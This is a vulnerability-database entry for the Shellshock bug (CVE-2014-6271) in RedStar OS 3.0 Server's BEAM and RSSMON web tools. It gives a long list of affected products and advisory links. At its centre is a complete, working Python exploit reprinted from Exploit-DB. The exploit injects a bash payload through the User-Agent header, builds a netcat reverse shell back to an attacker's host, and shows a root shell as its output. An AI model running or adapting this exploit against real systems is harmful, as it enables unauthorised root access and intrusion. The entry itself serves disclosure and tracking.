Details of VAR-E-201409-0022

ID

VAR-E-201409-0022

CVE

cve_id:	CVE-2014-6271	Trust: 1.0
cve_id:	CVE-2014-6278	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 40938

EDB ID

40938

TITLE

RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection - Linux local Exploit

Trust: 1.0

sources: EXPLOIT-DB: 40938

DESCRIPTION

RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection. CVE-2014-6271 . local exploit for Linux platform

Trust: 1.0

sources: EXPLOIT-DB: 40938

AFFECTED PRODUCTS

vendor:	redstar	model:	server	scope:	eq	version:	3.0	Trust: 1.0
vendor:	xerox	model:	workcentre	scope:	eq	version:	7245	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7242	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7238	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7235	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7232	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7228	Trust: 0.3
vendor:	xerox	model:	phaser	scope:	eq	version:	78000	Trust: 0.3
vendor:	xerox	model:	phaser	scope:	eq	version:	67000	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9393	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9303	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9302	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9301	Trust: 0.3
vendor:	ubuntu	model:	linux lts i386	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ubuntu	model:	linux lts amd64	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ubuntu	model:	linux sparc	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	10.04	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	11	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	3.2	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	3.1	Trust: 0.3
vendor:	oracle	model:	linux	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6.2	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	5	Trust: 0.3
vendor:	mcafee	model:	email gateway patch	scope:	eq	version:	7.01	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.0	Trust: 0.3
vendor:	mcafee	model:	email gateway hotfix	scope:	eq	version:	6.7.22	Trust: 0.3
vendor:	mcafee	model:	email gateway hotfix	scope:	eq	version:	6.7.21	Trust: 0.3
vendor:	ibm	model:	ds8000	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	7.1	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	6.1	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	5.3	Trust: 0.3
vendor:	hp	model:	insight control	scope:	eq	version:	0	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	4.2	Trust: 0.3
vendor:	gentoo	model:	linux	scope:	-	version:	-	Trust: 0.3
vendor:	cisco	model:	wide area application services	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified ip phone	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified contact center express	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	network analysis module	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	mds	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	gss 4492r global site selector	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	emergency responder	scope:	eq	version:	1.1	Trust: 0.3
vendor:	cisco	model:	digital media manager	scope:	eq	version:	5.0	Trust: 0.3
vendor:	cisco	model:	digital media manager	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	show and share	scope:	eq	version:	5(2)	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16.2	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 40938

EXPLOIT

#!/usr/bin/env python
# RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit
# ========================================================
# BEAM & RSSMON are Webmin based configuration utilities
# that ship with RSS server 3.0. These packages are the
# recommended GUI configuration components and listen on
# a user specified port from 10000/tcp to 65535/tcp. They
# are accessible on the local host only in vanilla install
# unless the firewall is disabled. Both services run with
# full root permissions and can be exploited for LPE or
# network attacks. RSSMON has hardened SELinux policies
# applied which hinder exploitation of this vulnerability
# be limiting access to network resources. Commands are
# still run as root in a blind way.
#
# $ python rsshellshock.py beam 192.168.0.31 10000 192.168.0.10 8080
# [+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit
# [-] exploiting shellshock CVE-2014-6271...
# sh: no job control in this shell
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:beam_t:s0-s15:c0.c1023
# sh-4.1#
#
# -- Hacker Fantastic (https://myhackerhouse.com)
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import subprocess
import requests
import sys
import os

def spawn_shell(cbport):
subprocess.call('nc -l ' + cbport, shell=True)

def shellshock(soft,ip,port,cbip,cbport):
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if soft == "beam":
user_agent = {'User-agent': '() { :; }; /bin/bash -c "rm /tmp/.f;mkfifo /tmp/.f;cat /tmp/.f|/bin/sh -i 2>&1|nc '+cbip+' '+cbport+' >/tmp/.f"'}
else:
shellstring = '() { :; }; /bin/bash -c "%s"' % (cbip)
user_agent = {'User-agent': shellstring}
print "[-] exploiting shellshock CVE-2014-6271..."
myreq = requests.get("https://"+ip+":"+port+"/session_login.cgi", headers = user_agent, verify=False)

if __name__ == "__main__":
print "[+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit"
if len(sys.argv) < 5:
print "[-] Use with <beam> <host> <port> <connectback ip> <connectback port>"
print "[-] Or with <rssmon> <host> <port> <cmd>"
sys.exit()
if(sys.argv[1]=="beam"):
newRef=os.fork()
if newRef==0:
shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])
else:
spawn_shell(sys.argv[5])
else:
shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],0)

Trust: 1.0

sources: EXPLOIT-DB: 40938

EXPLOIT LANGUAGE

Trust: 1.0

sources: EXPLOIT-DB: 40938

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 40938

TYPE

'Shellshock' 'BEAM' / 'RSSMON' Command Injection

Trust: 1.0

sources: EXPLOIT-DB: 40938

CREDITS

Hacker Fantastic

Trust: 1.0

sources: EXPLOIT-DB: 40938

EXTERNAL IDS

db:	NVD	id:	CVE-2014-6271	Trust: 1.0
db:	EXPLOIT-DB	id:	40938	Trust: 1.0
db:	JUNIPER	id:	JSA10661	Trust: 0.3
db:	JUNIPER	id:	JSA10648	Trust: 0.3
db:	ICS CERT	id:	ICSA-14-269-01	Trust: 0.3
db:	CERT/CC	id:	VU#252743	Trust: 0.3
db:	MCAFEE	id:	SB10085	Trust: 0.3
db:	NVD	id:	CVE-2014-7169	Trust: 0.3
db:	NVD	id:	CVE-2014-6278	Trust: 0.3
db:	BID	id:	70166	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 40938

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2014-6271	Trust: 1.0
url:	https://github.com/hackerfantastic/public/blob/8f5283534c3868814afc66d9e72963eced49c27b/exploits/rsshellshock.py	Trust: 1.0
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04540692	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004879	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685873	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685875	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21687971	Trust: 0.3
url:	http://www.gnu.org/software/bash/	Trust: 0.3
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096315	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04478866	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/1a2e5-5116a33c2fb27/cert_security_mini-_bulletin_xrx15k_for_77xx_r15-03_v1.0.pdf	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686433	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004898	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=isg3t1021279	Trust: 0.3
url:	https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04558068	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686246	Trust: 0.3
url:	https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_vulnerabilities_in_bash_affect_certain_qlogic_products_that_ibm_resells_for_bladecenter_and_flex_system_products_cve_2014_6271_c	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21685733	Trust: 0.3
url:	http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-372538.htm	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004905	Trust: 0.3
url:	http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04561445	Trust: 0.3
url:	http://seclists.org/fulldisclosure/2014/oct/25	Trust: 0.3
url:	http://www.vmware.com/security/advisories/vmsa-2014-0010.html	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685673	Trust: 0.3
url:	https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_bash	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004982	Trust: 0.3
url:	http://www.fortiguard.com/advisory/fg-ir-14-030/	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21687079	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686445	Trust: 0.3
url:	http://seclists.org/bugtraq/2015/feb/77	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004928	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/29a7e-50e49f9c009f9/cert_security_mini_bulletin_xrx14g_for_77xx_v1.1.pdf	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471532	Trust: 0.3
url:	https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=&solutionid=sk102673	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21685541	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686479	Trust: 0.3
url:	https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04497042	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/bluu-9paps5	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479536	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479492	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=ssg1s1004903	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=nas8n1020272	Trust: 0.3
url:	https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04512907	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/bluu-9paptz	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004911	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2eeef-51056e459c6d8/cert_security_mini-_bulletin_xrx15h_for_p7800_v1_0.pdf	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479505	Trust: 0.3
url:	https://kc.mcafee.com/corporate/index?page=content&id=kb83017	Trust: 0.3
url:	http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html?ref=rss	Trust: 0.3
url:	http://lcamtuf.blogspot.in/2014/09/quick-notes-about-bash-bug-its-impact.html	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004915	Trust: 0.3
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10085	Trust: 0.3
url:	https://ics-cert.us-cert.gov/advisories/supplement-icsa-14-269-01	Trust: 0.3
url:	https://downloads.avaya.com/css/p8/documents/100183172	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487573	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004945	Trust: 0.3
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096533	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=ssg1s1004932	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04488200	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479601	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685749	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2a901-510567b876a35/cert_security_mini-_bulletin_xrx15g_for_p6700_v1_0.pdf	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04497075	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479402	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685691	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686131	Trust: 0.3
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10661&cat=sirt_1&actp=list	Trust: 0.3
url:	http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140926-bash	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479398	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21686024	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2b8d8-513128526dd97/cert_security_mini-_bulletin_xrx15m_for_wc75xx_v1_1.pdf	Trust: 0.3
url:	http://seclists.org/bugtraq/2015/feb/76	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21685837	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=isg3t1021272	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/bluu-9paptm	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/1a7a1-50f12e334b734/cert_security_mini-_bulletin_xrx14h_for_wc59xx_v1.pdf	Trust: 0.3
url:	https://lists.gnu.org/archive/html/bug-bash/2014-10/msg00040.html	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2a20e-5105457a515cc/cert_security_mini-_bulletin_xrx15e_for_wc57xx_v1_0.pdf	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004897	Trust: 0.3
url:	http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-377648.htm	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004933	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686037	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04496383	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21686098	Trust: 0.3
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096503	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487558	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=isg3t1021361	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471546	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21686132	Trust: 0.3
url:	http://lcamtuf.blogspot.de/2014/09/bash-bug-apply-unofficial-patch-now.html	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471538	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685914	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685604	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04475942	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2df3c-51055b159fd50/cert_security_mini_bulletin_xrx15f_for_connectkey_1.5_v1-01.pdf	Trust: 0.3
url:	https://downloads.avaya.com/css/p8/documents/100183088	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686171	Trust: 0.3
url:	http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686494	Trust: 0.3
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10648	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 40938

SOURCES

db:	BID	id:	70166
db:	EXPLOIT-DB	id:	40938

LAST UPDATE DATE

2023-05-30T10:41:05.838000+00:00

SOURCES UPDATE DATE

db:

BID

id:

70166

date:

2016-07-05T21:53:00

SOURCES RELEASE DATE

db:	BID	id:	70166	date:	2014-09-27T00:00:00
db:	EXPLOIT-DB	id:	40938	date:	2016-12-18T00:00:00